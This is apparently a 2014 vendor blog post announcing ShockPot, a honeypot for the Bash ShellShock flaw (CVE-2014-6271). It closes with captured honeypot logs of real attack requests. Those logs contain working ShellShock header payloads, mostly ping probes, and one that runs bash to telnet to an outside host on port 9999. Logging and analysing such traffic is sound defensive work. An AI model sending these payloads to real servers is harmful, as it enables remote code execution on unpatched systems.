Introducing ShockPot: The intelligence driven defense against ShellShock

<p>While the security community is still recovering from the Heartbleed exploit disclosed this past April, here comes another game changing vulnerability: <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271">ShellShock</a>.  The simple but severe vulnerability is one of the most commonly deployed command line software shells and puts millions of systems at risk to local and remote code execution.</p><p>As of this morning, there were already several reports of malware spreading - leveraging the ShellShock attack.   As time elapses, expect to see wide-spread exploitation and a string of attacks from both underground cyber criminals, to potential nation-state backed actors .  Many organizations are now scrambling to understand how to detect, protect against, or identify ShellShock attacks.  So far we have seen a few network security vendors release early information like these <a href="http://www.volexity.com/blog/?p=19">Snort and Suricata signatures</a>. However, one approach yet to be introduced is an "active-defense" tool to counter ShellShock by leveraging the attackers own tactics against them.</p><p>In cyber security, using intelligence against an attacker is a well tested and highly successful technique.  We believe the strongest intelligence is generated by giving organizations the ability to locally monitor attempts on their own networks. Getting visibility into attacks on their own network creates the most relevant intelligence for defense.  This is why we released our popular open source honeypot management platform <a href="http://threatstream.github.io/mhn">Modern Honey Network (MHN)</a>.  We are pleased to announce that today, we are releasing the first ShellShock honeypot: Shockpot - with full integration into the Modern Honey Network!  Get it here: <a href="https://github.com/threatstream/mhn">https://github.com/threatstream/mhn</a></p><p>If you have not run MHN before, it's very simple to use and enables you to easily deploy highly effective honeypots generating a range of relevant threat intelligence from your own systems!  If you want to get Shockpot up and running quickly as a standalone honeypot, you can do that too for quick testing.  Just download it from our repository here: <a href="http://github.com/threatstream/shockpot">http://github.com/threatstream/shockpot</a>.</p><p><strong>ShockPot</strong></p><p>ShockPot is a web app honeypot created by ThreatStream Labs designed to find attackers attempting to exploit the Bash remote code vulnerability: ShellShock: <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271">CVE-2014-6271</a>.  It will log all HTTP requests to port 80 by default and detect ShellShock attacks while logging the exploit code and scripts.  It's easy to extract the URL's and files from the ShockPot to submit to <a href="http://www.virustotal.com/">VirusTotal</a> or <a href="https://www.anomali.com/products">ThreatStream Optic</a>.</p><p>Here are sample logs the honeypot picked up in the past 24 hours:</p><h5>{"remote": ["209.126.230.72", 57655], "data_type": "http", "timestamp": "2014-09-25T02:17:02.510100", "public_ip": "xxx.81.215.xxx", "data": {"request": "('/', ['User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)\r\n', 'Accept: */*\r\n', 'Cookie: () { :; }; ping -c 17 209.126.230.74\r\n', 'Host:() { :; }; ping -c 23 209.126.230.74\r\n', 'Referer: () { :; }; ping -c 11 209.126.230.74\r\n'], None)", "response": "302"}, "id": "621413ca-dd77-4f7d-a6c8-5a430b6d683d"} </h5><h5>{"remote": ["209.126.230.72", 57655], "data_type": "http", "timestamp": "2014-09-25T04:46:48.443125", "public_ip": "xxx.226.249.xxx", "data": {"request": "('/', ['User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)\r\n', 'Accept: */*\r\n', 'Cookie: () { :; }; ping -c 17 209.126.230.74\r\n', 'Host:() { :; }; ping -c 23 209.126.230.74\r\n', 'Referer: () { :; }; ping -c 11 209.126.230.74\r\n'], None)", "response": "302"}, "id": "f4e21a20-4a9b-4c07-8e18-89330534206a"}</h5><h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T08:38:10.363830", "public_ip": "xxx.199.235.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "567a5121-9484-483f-ad02-c358cbedf5a1"}</h5><h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T10:50:26.797778", "public_ip": "xxx.226.249.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "468ea6f4-609f-471a-9bfc-147fdf1b0848"}</h5><h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T11:31:01.423837", "public_ip": "xxx.241.155.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "41004bef-159b-4903-a83c-c465029eccf3"}</h5><h5>{"remote": ["89.207.135.125", 60000], "data_type": "http", "timestamp": "2014-09-25T12:12:38.297289", "public_ip": "xxx.81.215.xxx", "data": {"request": "('/cgi-sys/defaultwebpage.cgi', ['User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138\r\n', 'Accept: */*\r\n'], None)", "response": "404"}, "id": "dae909f5-0c0f-480a-bcfc-454527788eea"}</h5><h5>{"remote": ["114.91.107.58", 39475], "data_type": "http", "timestamp": "2014-09-25T16:53:43.335534", "public_ip": "xxx.241.155.xxx", "data": {"request": "('/', ['Host: xxx.241.155.xxx\r\n', 'Accept: */*\r\n', 'User-Agent: () { :;}; /bin/bash -c "telnet 197.242.148.29 9999""\r\n']</h5>